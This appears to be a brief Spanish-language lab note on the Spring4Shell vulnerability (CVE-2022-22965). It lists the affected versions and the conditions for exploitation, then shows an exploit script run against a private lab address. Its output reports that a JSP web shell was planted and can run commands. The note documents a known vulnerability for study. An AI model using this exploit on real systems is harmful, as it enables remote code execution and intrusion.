
Spring4Shell
Spring Framework 5.3.18 y 5.2.20
Spring Boot 2.6.6 y 2.5.12
Spring Core es el componente central de Spring Framework. Es la base para construir otros componentes en el ecosistema de Spring Framework, como Spring MVC, Spring Boot, Spring WebFlux. El código de explotación es ejecutable bajo las siguientes condiciones:
JDK 9 o superior
Apache Tomcat ejecuta contenedores de servlets
Empaquetado WAR
Dependencias del paquete: spring-webmvc o spring-webflux
Si la aplicación está desplegada como un archivo jar ejecutable de Spring Boot (como es el caso por defecto), no se verá afectada por esta falla de seguridad.
python CVE-2022-22965.py --url http://172.16.1.10:8080/helloworld/greeting
└─$ python cve-spring4shell.py --url http://172.16.1.10:8080/helloworld/greeting
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://172.16.1.10:8080/shell.jsp?cmd=id